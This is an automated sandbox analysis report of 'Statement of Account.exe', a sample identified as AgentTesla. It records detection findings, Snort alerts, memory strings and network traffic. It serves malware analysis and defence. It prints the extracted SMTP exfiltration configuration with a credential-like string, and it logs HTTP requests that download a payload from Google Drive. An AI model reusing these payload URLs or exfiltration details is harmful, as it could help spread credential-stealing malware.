Windows Analysis Report Statement of Account.exe

AV Detection:

Found malware configuration

Source: conhost.exe.3088.17.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "hemant@friendsequipment.com2018@hemantmail.friendsequipment.com"}

Multi AV Scanner detection for submitted file

Source: Statement of Account.exe

ReversingLabs: Detection: 23%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32DA50 CryptUnprotectData,		9_2_1D32DA50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32E0FB CryptUnprotectData,		9_2_1D32E0FB

Compliance:

Uses 32bit PE files

Source: Statement of Account.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

Binary contains paths to debug symbols

Source:	Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source:	Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then sub ecx, F6DD248Dh		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403827
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403697
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004038AC
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040371F
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004039C9
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403581
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403586
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403588
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040358A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040358C
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040358E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403592
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403596
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_00403598
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040359A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040359C
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_0040359E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035A0
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035A2
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035A4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035A6
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035A8
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004035AA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edi, edi		1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 4x nop then mov edx, edx		1_2_004031BE
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 5x nop then xor eax, dword ptr [edx+esi]		1_2_004031BE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49821 -> 65.60.11.90:587

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587

Uses SMTP (mail sending)

Source: global traffic

TCP traffic: 192.168.11.20:49821 -> 65.60.11.90:587

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443

Connects to IPs without corresponding DNS lookups

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Found strings which match to known social media urls

Source: RegAsm.exe, 00000009.00000002.52067274835.000000001E46F000.00000004.00000001.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

URLs found in memory or binary data

Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52067893875.000000001E4E8000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000003.48737845239.000000001D071000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: http://LUDB17WCKZR.org
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: http://VpGUaC.com
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp	String found in binary or memory: http://friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52067824237.000000001E4DA000.00000004.00000001.sdmp	String found in binary or memory: http://mail.friendsequipment.com
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%4
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/
Source: RegAsm.exe, 00000009.00000003.47831098250.000000000165E000.00000004.00000001.sdmp	String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/%%doc-0g-4k-docs.googleusercontent.com
Source: RegAsm.exe, 00000009.00000002.52056100424.000000000162E000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/4
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmp	String found in binary or memory: https://doc-0g-4k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/Q
Source: RegAsm.exe, 00000009.00000003.47831165616.0000000001665000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com//
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: RegAsm.exe, 00000009.00000002.52067968626.000000001E4F0000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/v104
Source: RegAsm.exe, 00000009.00000002.52066831984.000000001E412000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: RegAsm.exe, 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: drive.google.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/946on81l5g2k8pionitvg39ebi65v2bf/1634128725000/08714151441044389622/*/1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-4k-docs.googleusercontent.comConnection: Keep-Alive

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.11.20:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.11.20:49810 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands:

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Uses 32bit PE files

Source: Statement of Account.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Detected potential crypto function

Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00401868		1_2_00401868
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00403248		1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_0040225E		1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_0040346B		1_2_0040346B
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00403611		1_2_00403611
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_004032D4		1_2_004032D4
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_0040336A		1_2_0040336A
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_004033EA		1_2_004033EA
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_00403590		1_2_00403590
Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: 1_2_004031BE		1_2_004031BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01281130		9_2_01281130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01284320		9_2_01284320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01283A50		9_2_01283A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0128D490		9_2_0128D490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0128C730		9_2_0128C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01283708		9_2_01283708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_012915F0		9_2_012915F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01296F10		9_2_01296F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133B388		9_2_0133B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133ED48		9_2_0133ED48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_013394BF		9_2_013394BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133BEF8		9_2_0133BEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133B9B2		9_2_0133B9B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133D1AE		9_2_0133D1AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133D1FA		9_2_0133D1FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133B9EA		9_2_0133B9EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133D3AF		9_2_0133D3AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_01333282		9_2_01333282
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_0133D2D2		9_2_0133D2D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_013337D8		9_2_013337D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32A928		9_2_1D32A928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32B170		9_2_1D32B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D322480		9_2_1D322480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D325E28		9_2_1D325E28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32F130		9_2_1D32F130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D323DB8		9_2_1D323DB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D32B070		9_2_1D32B070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B49E8		9_2_1D7B49E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B78E0		9_2_1D7B78E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B0BD0		9_2_1D7B0BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B0040		9_2_1D7B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B7360		9_2_1D7B7360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B9CA0		9_2_1D7B9CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B5E68		9_2_1D7B5E68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B1A47		9_2_1D7B1A47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1D7B24B8		9_2_1D7B24B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1E275E08		9_2_1E275E08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1E274ACC		9_2_1E274ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1E275D20		9_2_1E275D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 9_2_1E276AF1		9_2_1E276AF1
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 14_2_00143DFE		14_2_00143DFE
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Code function: 16_2_000D3DFE		16_2_000D3DFE

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\Statement of Account.exe	Code function: String function: 0040177E appears 94 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 01286A80 appears 52 times

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\Statement of Account.exe	Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: Statement of Account.exe, 00000001.00000002.47853705109.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe
Source: Statement of Account.exe, 00000001.00000002.47854997401.0000000002AC0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameedderfu.exeFE2X vs Statement of Account.exe
Source: Statement of Account.exe	Binary or memory string: OriginalFilenameedderfu.exe vs Statement of Account.exe

PE file contains strange resources

Source: Statement of Account.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\Statement of Account.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe	Section loaded: edgegdi.dll			Jump to behavior

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC

Sample is known by Antivirus

Source: Statement of Account.exe

ReversingLabs: Detection: 23%

PE file has an executable .text section and no other executable section

Source: Statement of Account.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\Statement of Account.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Parts of this applications are using VB runtime library 6.0 (Probably coded in Visual Basic)

Source: C:\Users\user\Desktop\Statement of Account.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
